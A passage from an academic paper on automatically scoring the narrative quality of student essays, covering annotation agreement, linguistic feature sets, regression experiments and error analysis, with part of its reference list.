for an essay of score point 4 in terms of five aspects or sub-traits: “The narra- tive provides thorough, effective elaboration using rele- vant details, dialogue, and/or description: 1. clearly de- veloped Character/Setting/Events; 2. connections made to Source Materials; 3. effective use of a variety of Narrative Techniques; 4. effective use of sensory, con- crete, and figurative Language; 5. effective, appropriate Style.” 4.1.3 Conventions This dimension evaluates the language profi- ciency, judged on a scale of 1-3 integer score points, with 3 being the highest score. According to the rubrics, the following characterizes an essay of score point 3: “The response demonstrates an adequate com- mand of conventions: adequate use of correct sentence formation, punctuation, capitalization, grammar usage, and spelling.” 4.2 Sub-trait scoring As noted above, Organization and Development are each composed of 5 sub-traits. We scored these sub- traits manually using the same 4-point scale as the main trait scores. This yields 10 sub-trait scores in addition to the 3 main trait scores, for a total of 13 manually assigned scores per essay. We produced guidelines and selected a small set of benchmark es- says for training two scorers. 94 4.3 Narrative and Total Scores Based on the human-assigned trait scores, we de- rive Narrative and Total composite scores for each essay. The Narrative score for each essay is cal- culated by summing the Organization and Develop- ment trait scores. This gives the essay a Narrative score on an integer scale from 0 to 8. We sum up the three trait scores (Organization + Development + Conventions) to get a Total score on an integer scale from 0 to 11. Even though Narrative and Total composites are not defined separately/independently from their components, they provide us with an esti- mate of how manual and automated scoring will per- form on these data for scenarios where, for example, a single overall score has to be assigned. 5 Annotation and Data Statistics Two research assistants, both co-authors on the pa- per but not involved in system development, per- formed the scoring. Both annotators are native speakers of English with more than four years of linguistic annotation experience. Using the scor- ing rubric described above, the lead annotator cre- ated a guideline and benchmark dataset of 20 es- says spanning all score points. This was used for training a second annotator and three researchers (all co-authors on the paper), and the resulting feedback was used to refine the guidelines. Two rounds of training were conducted, with 10 and 20 essays re- spectively. A score discrepancy of more than one point for any of the traits triggered a discussion in order to bring the scores closer (that is, the scores should only differ by one point). Exact agreement was not sought due to the very subjective nature of judging stories. One of the researchers served as ad- judicator for the discussions. No specific training was performed for the sub-traits; disagreements on sub-traits were discussed only within trait-level dis- cussions. Once the training was completed, a total of 942 essays3 were scored. Of these, 598 essays were singly scored and 344 essays were double-scored to measure agreement. Scoring of each essay thus in- volved assigning 13 scores (3 traits + 10 sub-traits) and took approximately 10 to 20 minutes. Table 1 3For data requests see https://www.ets.org/ research/contact/data_requests/. shows the distribution of scores across the score- points for the three traits.4 Score 0 1 2 3 4 Org. 40 63 217 381 241 Dev. 40 84 270 319 229 Conv. - 115 365 462 - Table 1: Score distributions for traits 5.1 Inter-annotator Agreement To calculate agreement, we use Quadratic Weighted Kappa (QWK) (Cohen, 1968), a well-established metric in assessment that takes into account agree- ment due to chance. It is equivalent to a form of intra-class correlation and, in most cases, is compa- rable to Pearson’s r. The QWKs calculated over 344 doubly annotated essays are reported in Table 2. The three main traits are shown in bold, the sub-traits are prefixed with a ”:”, and the composite traits (Narra- tive and Total) are shown in italics. Trait:Sub-trait QWK Organization 0.71 :Plot 0.62 :Characters/Setting/POV 0.65 :Transitioning 0.57 :Sequencing 0.63 :Opening/Closing 0.66 Development 0.73 :Characters/Setting/Events 0.68 :Narrative Techniques 0.64 :Language 0.59 :Source Materials 0.52 :Style 0.58 Convention 0.46 Narrative (Org. + Dev.) 0.76 Total (Org. + Dev. + Conv.) 0.76 Table 2: Inter-annotator agreement For the Organization and Development traits, which capture the narrative aspects of writing, 4The “Message in a Bottle” sample essay in Section 3 re- ceived scores of Org.:3, Dev.:4, and Conv.:3. The high score for Conventions reflects the rubric’s requirement of adequate (but not stellar) command of language usage. 95 scoring agreement is quite high: Organization (QWK=0.71) and Development (QWK=0.73). This result is promising as it indicates that Organization and Development of story-telling can be reliably scored by humans. Surprisingly, the agreement for the non-narrative dimension, Conventions, is only rather moderate (QWK=0.46). Discussion among the two annotators revealed that the criteria for the score points in Conventions were very subjective. For example, they had difficulty deciding on when a Conventions violation, such as a specific grammati- cal error, was severe, and how much variety among the error types was needed to move the Conventions score from one score point to another. Table 2 shows that agreement for all sub-traits is lower than agreement for the corresponding trait. Sub-trait agreement results also show that some story traits are more reliably scored than others. For example, it is easier to evaluate good openings and closings in stories (QWK=0.66) than to evaluate the quality of story style (QWK=0.58). Evaluation of stylistic devices and whether they indeed enhance the story is rather subjective. Agreement for the Narrative and Total scores is also quite good. Narrative achieves a higher QWK than its individual components. The high agreement of the Total scores is interesting, as it incorporates the Conventions scores, on which substantial agree- ment was not achieved. 5.2 Inter-trait correlations Previous research on writing has shown that traits are usually correlated (Lee et al., 2010; Bacha, 2001; Klein et al., 1998). We also observed this in our data. Inter-trait correlations (Pearson’s r) are shown in Ta- ble 3. Scores for Organization and Development, are highly correlated (r = 0.88), and each is also correlated with Conventions (r = 0.40 and 0.42, re- spectively), albeit not as strongly. Not surprisingly, the composite scores, Narrative and Total, are highly correlated to their components. 6 Linguistic Features We used the scoring rubric as a guideline for explor- ing construct-relevant features with a view towards automated analysis. We developed sets of features for the different narrative characteristics. Each set is Org. Dev. Conv. Nar. Tot. Org. 1.00 0.88 0.40 0.97 0.93 Dev. 1.00 0.42 0.97 0.94 Conv. 1.00 0.42 0.64 Nar. 1.00 0.97 Total 1.00 Table 3: Score correlations for traits, Narrative and Total. described in detail in the following sections. 6.1 Transition Feature Set Effective organization of ideas and events is typi- cally achieved with the use of discourse markers. In order to encode effective transitioning, we com- piled a transition-cue lexicon, and constructed fea- tures based on it. We compiled a list of 234 discourse cues from the Penn Discourse Treebank (PDTB) manual (Prasad et al., 2008), and we manually collected a list of tran- sition cues from the web by mining websites that provide tips on good essay/narrative writing. The latter, with a total of 484 unigrams and multi-word expressions, is more focused on cues that are used commonly to write stories (e.g., cues that provide locational or temporal connections) than the former. Using the lexicon, we extracted two features from each essay: the number of cues in the essay and that number divided by the essay length. These two fea- tures form the Transition feature set. 6.2 Event-oriented Feature Set Events are the building blocks of narratives, and good story-telling involves skillfully stringing events together. We construct an event-based fea- ture set, Events, to capture event cohesion and co- herence. Following the methodology proposed by Chambers and Jurafsky (2008), we built a database of event pairs from the GigaWord Fifth Edition cor- pus (Parker et al., 2011). Specifically, we used the Annotated Gigaword distribution (Napoles et al., 2012), which has been automatically annotated with typed dependency information (de Marneffe and Manning, 2008). Following Chambers and Ju- rafsky (2008), we define events as verbs in a text (excluding be/have/do) and pairs of events are de- fined as those verbs that share arguments in the text. 96 In the present work we limit our scope to the fol- lowing set of (typed dependency) arguments: nsubj, dobj, nsubjpass, xsubj, csubj, csubjpass. To estimate event cohesion, we extract all event pairs from an essay after pre-processing it with the Stanford Core NLP toolkit (Manning et al., 2014). Event tokens from the essay are linked into pairs when they share a filler in their arguments. For essays, we use Stanford co-reference resolution for matching fillers of verb-argument slots. For all event pairs extracted from an essay, we query the events database to retrieve the pair association value (we use the point-wise mutual information (Church and Hanks, 1990)). We define three quantitative mea- sures to encode event cohesion: (1) total count of event pairs in the essay; (2) proportion of in-essay event-pairs that are actually found in the events database; (3) proportion of in-essay event-pairs that have substantial association (we use PMI ≥ 2). We also capture aspects of coherent event se- quencing. For this, we compute event chains, which are defined as sequences of events that share the same actor or object, in subject or direct object role (Chambers and Jurafsky, 2008). Specifically, we en- code the following additional features in the Events feature set: (4) the length of the longest chain found in the essay (i.e., number of event pairs in the chain); (5) the score of the longest chain (computed as the sum of PMI values for all links (event pairs) of the chain); (6) the length of the second longest chain found in the essay; (7) the score of the highest scor- ing chain in the essay; (8) the score of the second highest scoring chain in the essay; (9) the score of the lowest scoring chain is the essay; (10) the sum of scores for all chains in the essay. For each of the features 4-10, we also produce a feature that is normalized by the log of the essay length (log word- count). 6.3 Subjectivity-based Feature Set Evaluative and subjective language is used to de- scribe characters (e.g., foolish, smart), situations (e.g., grand, impoverished) and characters’ private states (e.g., thoughts, beliefs, happiness, sadness) (Wiebe, 1994). These are evidenced when charac- ters are described and story-lines are developed. We use two lexicons for detecting sentiment and subjective words: the MPQA subjectivity lexicon (Wilson et al., 2005) and a sentiment lexicon, AS- SESS, developed for essay scoring (Beigman Kle- banov et al., 2012). MPQA associates a posi- tive/negative/neutral polarity category to its entries, while ASSESS assigns a positive/negative/neutral polarity probability to its entries. We consider a term from ASSESS to be polar if the sum of positive and negative probabilities is greater than 0.65 (based on manual inspection of the lexicon). The neutral cat- egory in MPQA comprises subjective terms that in- dicate speech acts and private states (e.g., view, as- sess, believe), which is valuable for our purposes. The neutral category in ASSESS consists of non- subjective words (e.g., woman, technologies), which we ignore. The polar entries of the two lexicons dif- fer too. ASSESS provides polarity for words based on the emotions they evoke. For example, alive, awakened and birth are highly positive, while crash, bombings and cyclone are strongly negative. We construct a Subjectivity feature set comprised of 6 features encoding, for each essay, the presence (a binary feature) and the count of MPQA and AS- SESS polar words and MPQA neutral words. 6.4 Detailing Feature Set Providing specific details, such as names to char- acters, and describing the story elements, helps in developing the narrative and providing depth to the story. Proper nouns, adjectives and adverbs come into play when a writer provides descriptions. Thus, we create a Details feature set comprised of a total of 6 features encoding, separately, the presence (a binary feature) and the count of proper nouns, ad- jectives and adverbs. 6.5 Graph Feature Set Graph statistics have been reported to be effective for capturing development and coherence in essays (Mesgar and Strube, 2016; Somasundaran et al., 2016). We closely follow the implementation and features described in Somasundaran et al. (2016) for capturing narrative development (due to space constraints we refer the reader to the original paper). Graphs were constructed from essays by represent- ing each content word (word type) in a sentence as a node in the graph. Links were drawn between words belonging to adjacent sentences. Features based on connectivity, shape and PageRank were extracted, 97 giving a total of 19 Graph features. Specifically, the features used were: percentage of nodes with de- grees one, two and three; the highest, second-highest and median degree in the graph; the highest degree divided by the total number of links; the top three PageRank values in the graph, their respective neg- ative logarithms, and their essay length-normalized versions; the median PageRank value in the graph, its negative log and essay length-normalized ver- sion. 6.6 Content word usage Content word usage, also known as lexical density (Ure, 1971), refers to the amount of open-class (con- tent words) used in an essay. The greater proportion of content words in a text, the more difficult or ad- vanced it is (Yu, 2010; O’Loughlin, 1995), and it has been suggested that, for academic discourse, too much lexical density is detrimental to clarity (Hal- liday and Martin, 1993). The Content feature is the inverse of the proportion of content words (POS tagged noun/verb/adjective/ adverb) to all words of an essay. 6.7 Pronoun Usage The use of pronouns in story-writing has several im- portant aspects. On one hand, pronouns can indi- cate the point of view (perspective) in which the story is written (Fludernik, 2009; Rimmon-Kenan, 2002). Perspective is important in both construction and comprehension of narrative (Rimmon-Kenan, 2002). The use of pronouns is also related to reader engagement (Mentzell et al., 1999) and im- mersion (Oatley, 1999). Stories with first person pronouns lead to stronger reader immersion, while stories written in third person lead to stronger reader arousal (Hartung et al., 2016). In our data, we counted personal pronouns (e.g., I, he, it), including contractions (e.g., he’s), and possessive pronouns (e.g., my, his). For each story, the counts were nor- malized by essay length. A single feature, Pronoun, was encoded using the proportion of first and third person singular pronouns in the essay. 6.8 Modal Feature As an account of connected events, a narrative typ- ically uses the past tense. By contrast, modals ap- pear before untensed verbs and generally refer to the present or the future. They express the degree of ability (can, could), probability (shall, will, would, may, might), or obligation/necessity (should, must). An overabundance of modals in an essay might be an indication that it is not a narrative or is only marginally so. This idea is captured in the Modal feature, which is the proportion of modals to all words of an essay. 6.9 Stative Verbs Stative verbs are verbs that describe states, and are typically contrasted with dynamic verbs, which describe events (actions and activities) (Vendler, 1967). In narrative texts, stative verbs are often used in descriptive passages (Smith, 2005), but they do not contribute to the progression of events in a story (Almeida, 1995; Prince, 1973). Our conjecture is that if a text contains too many stative verbs, then it may not have enough of an event sequence, which is a hallmark of a narrative. We compiled a list of 62 English stative verbs (e.g., know, own, resemble, prefer) from various linguistic resources on the web. During processing of an essay, we identify verbs by POS tags, and stative verbs via list-lookup. Sepa- rately, we identify copular uses of “to be” and count them as statives. Our feature, Statives, is the propor- tion of stative verbs out of all verbs in an essay. 7 Experiments Our experiments investigate the following ques- tions: (1) Is it possible to score narrative quality traits in essays using automated methods? (2) Which of our feature sets are effective for scoring narrative quality traits? (3) How do our narrative-inspired fea- tures perform as compared to a baseline that is com- petitive but does not specifically address the narra- tive construct? (4) How does overall scoring of nar- rative essays differ from trait scoring? (5) What are the best feature combinations for narrative scoring? To answer these questions, we built and evaluated scoring systems for each trait, overall Narrative and Total scores. In each case, we performed detailed ablation studies at the feature-set level. We have 10 features sets (9 feature sets described above plus a baseline feature set); thus 1024 feature set combi- nations were investigated. As our traits are highly correlated, we used all of our features for building 98 systems for each trait, leaving it to the ablation pro- cess to reveal the most promising feature set combi- nation. 7.1 Baseline E-rater (Attali and Burstein, 2006), a state-of-the- art commercial system for automatic essay scor- ing, uses a comprehensive suite of features cover- ing many aspects of writing quality, such as gram- mar, language use, mechanics, fluency, style, or- ganization, and development. We use all of the features from e-rater, a total of 10 features, as the Baseline feature set. While e-rater is not designed for trait scoring, it incorporates features that ad- dress the traits of interest in this work. Develop- ment and Organization are captured by features that, among other things, count and encode the num- ber and length of discourse elements such as the- sis, main points, supporting ideas, and conclusion (Burstein et al., 2003). 7.2 Results We experimented with Linear Regression, Sup- port Vector Regression (RBF kernel), Random Forests, and Elastic Net learners from the scikit- learn toolkit (Pedregosa et al., 2011), with 10-fold cross-validation on 942 essays. As Linear Regres- sion results were consistently better, both for Base- line and for our features, we only report results from this learner. Trimming of the predicted lin- ear regression output was performed; that is, if the predicted score was above the max score, or be- low the min score, it was assigned the max or the min score, respectively. Bootstrapping experiments (Berg-Kirkpatrick et al., 2012; Efron and Tibshirani, 1994) were performed to test for statistical signifi- cance (we used 1000 bootstrap samples). For each trait-scoring experiment, we extracted all the features (described in Section 6) from the es- says and used the corresponding human trait scores for training and testing. Thus, the input essays and their features are the same across all experiments. What varies is the trait to be predicted and, conse- quently, the performance of feature sets as well as the best feature combination. Table 4 shows the performance of Baseline, the individual features, all features, and the best fea- ture combination, for all three traits, overall Nar- rative and Total scoring. Performance of individ- ual features that exhibit some predictive power is also shown in the table. The single-measure fea- tures Modal, Pronoun, Content, and Stative show no predictive power individually (QWKs = 0) and are omitted from the table for space reasons. Organization Understandably, Baseline performs poorly for scoring Organization in narratives, as its focus is evaluating overall writing proficiency. In- dividual feature sets, Details, Transition, Events and Subjectivity, have some predictive capability, but it is not very high. This is not surprising as they each encode only a specific aspect of narrative quality. The Graph feature set outperforms the Baseline fea- ture set, but the difference is not statistically signif- icant. When all features are put together (All fea- tures), the QWK obtained is 0.56, which is substan- tially higher than Baseline (p < 0.001), but as not as good as the best performing feature set. The best combination of our proposed features (Details+ Modal+ Pronoun+ Content+ Graph+ Sub- jectivity+ Transition) achieves a QWK of 0.60, sub- stantially better performance than Baseline (p < 0.001), reflecting an improvement of 13 percentage points. This result indicates that developing features to encode narrative quality is important for evaluat- ing Organization in narrative essays. Most of our explored feature sets, even those that do not individ- ually perform well, are part of the best system. Two feature sets that are not present in the best feature combination are Statives and Events. The exclusion of the former is reasonable – stative verbs are re- lated to story development. The exclusion of Events is surprising, as it intuitively encodes the coherence of events, impacting the organization of the essay. The best feature combination that includes Events achieves a QWK of 0.58. The Baseline features are not part of the best system, confirming our intuition that features that specifically encode narrative qual- ity are needed for this narrative trait. From our ablation results, we inspected the top 10 best-performing feature set combinations in order to determine which features consistently produce good systems. Pronoun, Content, Graph and Subjectivity were a part of all 10 of the 10 top systems, Transition was in 9, Details was in 7 and Modal was in 6 feature sets. This suggests that singleton features such as 99 Feature set Organization Development Conventions Narrative Total Baseline 0.47 0.51 0.44 0.53 0.60 Details 0.36 0.41 0.19 0.39 0.41 Transition 0.39 0.50 0.23 0.49 0.48 Events 0.39 0.43 0.26 0.45 0.45 Subjectivity 0.41 0.47 0.20 0.47 0.46 Graph 0.49 0.54 0.17 0.56 0.54 All features 0.56 0.63 0.46 0.65 0.67 Best feature combination* 0.60 0.66 0.50 0.67 0.70 Table 4: Performance (QWK) on predicting traits and Narrative and Total scores; Best feature combinations: *For Organization: Details+ Modal+ Pronoun+ Content+ Graph+ Subjectivity+ Transition; *For Development: Details+ Modal+ Content+ Graph+ Statives+ Transition; *For Conventions: Baseline + Details + Graph; *For Narrative: Baseline+ Details+ Modal+ Pronoun+ Content+ Graph+ Statives+ Subjectivity+ Transition; *For Total: Details+ Baseline+ Modal+ Content+ Graph+ Subjectivity+ Transition Pronoun and Content are indeed useful, even though they cannot be used in isolation. Development We observe similar trends seen with the Organization trait – the Baseline feature set does not capture Development very effectively, and some individual feature sets have predictive power for this trait but perform poorly. Graph outper- forms Baseline, but this is not statistically signifi- cant. Using all of the available features produces QWK=0.63, a significant improvement over Base- line, (p < 0.001). The best system achieves a per- formance of QWK=0.66, outperforming Baseline by 15 percentage points (p < 0.001). The best feature combination contains 6 of the 9 proposed features and differs from the best features for Organization by the inclusion of Statives and the exclusion of Pro- noun and Subjectivity. Content, Graph and Transi- tion also occur in all of the top 10 best-performing systems. Conventions Even though scoring language con- ventions is not the focus of this work, we were cu- rious how well our features evaluate this dimension. We observe that overall performance is lower than for the other two traits, which is to be expected as we do not have high human inter-rater agreement to start with. The Baseline e-rater feature set is the best performing individual feature set, and the narrative- specific features perform rather poorly. Using all features (QWK=0.46) only produces a 2 point im- provement over Baseline, which is not statistically significant. Adding Details and Graph to Baseline produces the best system, an improvement of 6 per- centage points, QWK=0.50, (p < 0.001). All three features are also the only feature sets that consis- tently occur in all the 10 top-performing systems. Narrative In general, the results for Narrative scoring follow the same trends as the results for Or- ganization. Graph features outperform the Baseline significantly (p < 0.05). Using all available features produces a significant improvement in performance (0.65 QWK; p < 0.001). Baseline features are now a part of the best feature set combination (Baseline+ Details+ Modal+ Pronoun+ Content+ Graph+ Sta- tives+ Subjectivity+ Transition), which achieves a QWK of 0.67, an improvement of 14 percentage points (p < 0.001). The best feature combination without the Baseline features achieves QWK = 0.66, and this is not statistically different from the per- formance of the best system. Modal, Content, and Graph occur in all 10, and Subjectivity and Transi- tion occur in nine of the top 10 feature combinations. Total For Total scoring, the Baseline feature set is the best performing individual feature set, with QWK = 0.60. Using all features produces a signifi- cant (p < 0.001) performance boost at 0.67 QWK. The best feature combination (Details+ Baseline+ Modal+ Content+ Graph+ Subjectivity+ Transition) improves over Baseline by 10 percentage points, 100 with a QWK of 0.70 (p < 0.001). The best result obtained by a feature combination without Baseline (Details+ Modal+ Content+ Graph+ Subjectivity+ Transition) is QWK = 0.68, which is significantly higher than the Baseline performance (p < 0.001), indicating that our features are able to effectively score essays by themselves, as well as in combina- tion with the Baseline features to get an improved system. Except for Details and Transition, all fea- tures of the best system also occur in all the top-10 systems. 8 Analysis and Discussion The results show that our proposed features vary in effectiveness. Graph features proved to be more effective than Transition, Subjectivity and Details. The effectiveness of single-measure features (Pro- noun, Statives, Content and Modal) was evident by their inclusion in the best combination models. Although Events was reasonably predictive on its own for Organization and Development, it was not found in the best performing combinations, nor did it participate in the top 10 feature sets for any of the traits. This surprising result suggests that other features, which are correlated with Events, must be stronger indicators of narrative competence. Our results also show no clear segregation of fea- tures by trait, as most of the features appearing in the best models for Organization and Development were the same. We attribute this to the high correla- tion between the human scores for the two traits; a model that is good for one will be good for the other. 8.1 Correlation Study We performed correlation analysis to test if our intu- itions regarding the feature sets, as discussed in Sec- tion 6, are supported by the data, and to study the effect of length. Length is a well-known confound- ing factor in essay scoring as longer essays tend to get higher scores (Chodorow and Burstein, 2004). This also applies to narratives, as it is difficult to tell a good story without using a sufficient amount of words. In our data, Pearson correlations of essay length with human scores are: Conv.: 0.35, Dev.: 0.58, Org.: 0.54. However, it is important that our encoded features capture more than just the length of the narrative. In order to test this, we conducted cor- Feat Org Dev Conv Base. 0.19 (0.28) 0.19 (0.41) 0.39 (0.43) Detl. 0.17 (0.21) 0.16 (0.20) 0.08 (0.18) Trans. -0.10 (0.23) -0.15 (0.22) -0.05 (0.27) Event 0.20 (0.27) 0.19 (0.26) 0.14 (0.19) Subj. 0.17 (0.48) 0.19 (0.52) 0.07 (0.12) Graph 0.36 (0.61) 0.39 (0.65) 0.06 (0.28) Cont. -0.19 (-0.30) -0.20 (-0.31) -0.20 (-0.28) Pron. 0.19 (0.18) 0.17 (0.17) 0.12 (0.10) Modal -0.17 (-0.17) -0.21 (-0.17) -0.01 (-0.18) Statv. -0.10 (-0.18) -0.10 (-0.18) -0.05 (-0.11) Table 5: Maximal partial correlations with scores, con- trolling for length (simple correlations in parentheses). relation analysis between each feature and human trait score by partialling out length. Table 5 shows the maximal partial correlation of each feature set with the human scores. For feature sets that contain only a single feature (e.g., Modal), we directly report the partial correlation for that fea- ture. For feature sets that contain multiple features, due to space constraints, we report the maximal par- tial correlation achieved by any feature within that set5. The value in the parentheses indicates the cor- responding feature’s simple correlation with score. We observe that for all features except Pronoun and Modal, the correlation with score drops when length is accounted for, indicating the influence of essay length on scores. This effect is more pro- nounced in features that employ counts (e.g., counts of adverbs), as more support is found in longer es- says. The baseline is correlated more with conven- tions than the two narrative traits. An opposite effect is seen for our narrative-specific features. The neg- ative sign for Statives, Content and Modal supports our intuitions regarding these features – more use of these reduces story quality. 8.2 Error Analysis Table 6 shows the human-machine confusion matrix for Development trait scores. Confusion matrices for other traits also show a similar trend. We observe that most of the errors in score prediction are at adja- cent score points. This is perhaps in part due to our human-human agreement criterion during data an- 5Note that, within a set, different features might have maxi- mum values for different traits 101 Human Machine 0 1 2 3 4 total 0 8 9 18 5 0 40 1 8 28 43 5 0 84 2 1 8 159 101 1 270 3 0 0 83 205 31 319 4 0 0 9 125 95 229 Table 6: Human-machine confusion matrix for Develop- ment traits scores notation – disagreement of one score point did not trigger adjudication. The system encounters more difficulty predicting the correct scores at the ends of the scale (score points 0-1 and score point 4). The difficulty with scores 0 and 1 is partially attributable to the small amount of training data for these scores. In a more detailed analysis of the human-machine discrepancies, we first focus on the forty essays that were rated 0 by the annotators (Table 6, row 1). The machine and human agreed on only eight of these. All eight are non-narratives, and seven of them are extremely short (3 to 51 words). Twenty seven of the remaining 32 were well-written, long, non-narrative essays (and thus off-purpose accord- ing to our rubric). For example, one of the essays, which was written for a “describe a travel experi- ence” prompt, presented a discussion about the edu- cational advantages of travel in general. Next, we consider the 84 essays (all narratives) that were rated 1 by the annotators (row 2 of Table 6). Of these, the eight that were scored 0 by the ma- chine were rather short (length 15 to 69 words) and poorly written. The human and the machine agreed on 28 essays, whose average length was somewhat longer (93 words). For the 43 essays that the ma- chine over-scored by 1 point, the average length was 154 words. All five essays that the machine over- scored by 2 points were long, ranging from 200 to 421 words, but were either expository essays or were very poorly written. This scoring pattern sug- gests that human-machine disagreement is at least partially rooted in essay length. For the essays that were rated 4 by the human an- notators (Table 6, last row), the machine underesti- mated nine essays by 2 points. These essays were relatively short (from 135 to 383 words). For com- parison, in the 125 essays where the machine under- estimated the human score by only one point, the average length was 418 words. For the 95 essays that were scored 4 by both the human and machine, the average length was 653 words. A similar effect of length was seen among the essays scored 2 and 3 by the human annotators. The error analysis at the lowest range of human scores demonstrates that an accurate system must be able to properly handle non-narrative essays. One possible solution is to consider coupling our sys- tem with a binary narrative classifier that would flag non-narrative essays. Further research is also clearly needed to reduce the influence of essay length on automated scoring. This was particularly demon- strated for essays where writers managed to produce well written, but very short, stories that were under- scored by the machine. 9 Conclusions and Future Work In this article, we have presented evidence that hu- mans can reliably score development and organiza- tion traits and their sub-traits in narratives, and that some sub-traits can be more reliably scored than oth- ers. We have also presented evidence that automated systems with narrative-specific features can reliably score narrative quality traits and can do so signifi- cantly better than a state-of-the-art system designed to assess general writing proficiency. Scoring narrative essays is challenging because typically there is no right answer, nor any limit to the creative possibilities in effective story-telling. In this work, we have explored only the proverbial tip of the iceberg in terms of features and methods for scoring narrative essays. While we are encouraged by our results, we believe that further improvement will re- quire more elaborate representations of story content and meaning. Accordingly, we plan to explore au- tomated evaluation of narrative sub-traits, including plot, point of view and character development, and of the relationships among them. References Caralee J. Adams. 2014. Essay-grading software seen as time-saving tool. Education Week, 33(25):13–15. 102 Apoorv Agarwal, Anup Kotalwar, and Owen Rambow. 2013. Automatic extraction of social networks from literary text: A case study on Alice in Wonderland. In Proceedings of the 6th International Joint Conference on Natural Language Processing, pages 1202–1208. Michael J. Almeida. 1995. Time in narratives. Deixis in Narrative: A Cognitive Science Perspective, pages 159–189. Teresa M. Amabile. 1982. Social psychology of creativ- ity: A consensual assessment technique. Journal of Personality and Social Psychology, 43(5):997 – 1013. Yigal Attali and Jill Burstein. 2006. Automated essay scoring with e-rater v. 2.0. Journal of Technology, Learning, and Assessment, 4:3. Nahla Bacha. 2001. Writing evaluation: What can an- alytic versus holistic essay scoring tell us? System, 29(3):371–383. Niranjan Balasubramanian, Stephen Soderland, Mausam, and Oren Etzioni. 2013. Generating coherent event schemas at scale. In Proceedings of the 2013 Confer- ence on Empirical Methods in Natural Language Pro- cessing, pages 1721–1731, Seattle, WA, October. David Bamman, Ted Underwood, and Noah A. Smith. 2014. A Bayesian mixed effects model of literary character. In Proceedings of the 52nd Annual Meet- ing of the Association for Computational Linguistics, pages 370–379, Baltimore, MA, USA, June. Beata Beigman Klebanov, Jill Burstein, Nitin Madnani, Adam Faulkner, and Joel Tetreault. 2012. Build- ing subjectivity lexicon(s) from scratch for essay data. Computational Linguistics and Intelligent Text Pro- cessing, pages 591–602. Beata Beigman Klebanov, Nitin Madnani, Jill Burstein, and Swapna Somasundaran. 2014. Content impor- tance models for scoring writing from sources. In Proceedings of the 52nd Annual Meeting of the Asso- ciation for Computational Linguistics (Short Papers), pages 247–252. Taylor Berg-Kirkpatrick, David Burkett, and Dan Klein. 2012. An empirical investigation of statistical sig- nificance in NLP. In Proceedings of the 2012 Joint Conference on Empirical Methods in Natural Lan- guage Processing and Computational Natural Lan- guage Learning, pages 995–1005. Association for Computational Linguistics. Thomas Bogel, Jannik Strotgen, and Michael Gertz. 2014. Computational narratology: Extracting tense clusters from narrative texts. In Nicoletta Calzo- lari (Conference Chair), Khalid Choukri, Thierry Declerck, Hrafn Loftsson, Bente Maegaard, Joseph Mariani, Asuncion Moreno, Jan Odijk, and Stelios Piperidis, editors, Proceedings of the Ninth Interna- tional Conference on Language Resources and Eval- uation, Reykjavik, Iceland, May. European Language Resources Association (ELRA). Hein Broekkamp, Tanja Janssen, and Huub van den Bergh. 2009. Is there a relationship between litera- ture reading and creative writing? Journal of Creative Behavior, 43(4):281 – 296. Jill Burstein, Daniel Marcu, and Kevin Knight. 2003. Finding the write stuff: Automatic identification of discourse structure in student essays. IEEE Intelligent Systems, 18(1):32–39. Asli Celikyilmaz, Dilek Hakkani-Tur, Hua He, Greg Kondrak, and Denilson Barbosa. 2010. The actor- topic model for extracting social networks in literary narrative. In In Proceedings of the 24th Annual Con- ference on Neural Information Processing Systems. Nathanael Chambers and Dan Jurafsky. 2008. Unsuper- vised learning of narrative event chains. In Proceed- ings of ACL-08: HLT, pages 789–797. Nathanael Chambers and Dan Jurafsky. 2009. Unsu- pervised learning of narrative schemas and their par- ticipants. In Proceedings of the 47th Annual Meeting of the ACL and the 4th IJCNLP of the AFNLP, pages 602–610. Nathanael Chambers. 2013. Event schema induction with a probabilistic entity-driven model. In Proceed- ings of the 2013 Conference on Empirical Methods in Natural Language Processing, pages 1798–1807, Seattle, WA, October. Eugene Charniak. 1972. Toward a model of children’s story comprehension. Technical report, MIT, Cam- bridge, MA, USA. Snigdha Chaturvedi, Dan Goldwasser, and Hal Daume III. 2015. Ask, and shall you receive?: Understanding desire fulfillment in natural language text. arXiv preprint arXiv:1511.09460. Snigdha Chaturvedi, Shashank Srivastava, Hal Daumé III, and Chris Dyer. 2016. Modeling evolving relationships between characters in literary novels. In Proceedings of the Thirtieth Association for the Advancement of Artificial Intelligence Conference on Artificial Intelligence, pages 2704–2710. Associ- ation for the Advancement of Artificial Intelligence Press. Martin Chodorow and Jill Burstein. 2004. Beyond essay length: Evaluating e-rater’s performance on TOEFL essays. TOEFL research report 73, Educational Test- ing Service, Princeton, NJ, USA. Kenneth Ward Church and Patrick Hanks. 1990. Word association norms, mutual information, and lexicogra- phy. Computational Linguistics, 16(1):22–29, March. Jacob Cohen. 1968. Weighted kappa: Nominal scale agreement provision for scaled disagreement or partial credit. Psychological Bulletin, 70(4):213. 103 Marie-Catherine de Marneffe and Christopher D. Man- ning. 2008. The Stanford typed dependencies repre- sentation. In COLING Workshop on Cross-framework and Cross-domain Parser Evaluation. Bradley Efron and Robert J. Tibshirani. 1994. An intro- duction to the bootstrap. CRC press. Scott Elliot. 2003. Intellimetric: From here to valid- ity. Automated essay scoring: A cross-disciplinary perspective, pages 71–86. Micha Elsner. 2012. Character-based kernels for novel- istic plot structure. In Proceedings of the 13th Confer- ence of the European Chapter of the Association for Computational Linguistics, pages 634–644. Associa- tion for Computational Linguistics. David K. Elson, Nicholas Dames, and Kathleen R. McK- eown. 2010. Extracting social networks from literary fiction. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 138–147. Association for Computational Linguistics. David K. Elson. 2012. Modeling Narrative Discourse. Ph.D. thesis, Columbia University. Noura Farra, Swapna Somasundaran, and Jill Burstein. 2015. Scoring persuasive essays using opinions and their targets. In Tenth Workshop on Innovative Use of NLP for Building Educational Applications. Mark Alan Finlayson. 2012. Learning narrative struc- ture from annotated folktales. Ph.D. thesis, Mas- sachusetts Institute of Technology. Mark A. Finlayson. 2013. A survey of corpora in compu- tational and cognitive narrative science. Sprache Und Datenverarbeitung (International Journal for Lan- guage Data Processing), 37(1–2). Monika Fludernik. 2009. An Introduction to Narratol- ogy. Routledge, London. Ronald B. Gillam and Nils A. Pearson. 2004. TNL: Test of Narrative Language. Austin, TX: Pro-Ed. Amit Goyal, Ellen Riloff, and Hal Daumé III. 2010. Au- tomatically producing plot unit representations for nar- rative text. In Proceedings of the 2010 Conference on Empircal Methods in Natural Language Processing, Boston, MA. Michael A. K. Halliday and James R. Martin. 1993. Writing Science: Literacy and Discursive Power. The Falmer Press, London. Harry Halpin and Johanna D. Moore. 2006. Event ex- traction in a plot advice agent. In Proceedings of the 21st International Conference on Computational Lin- guistics and the 44th Annual 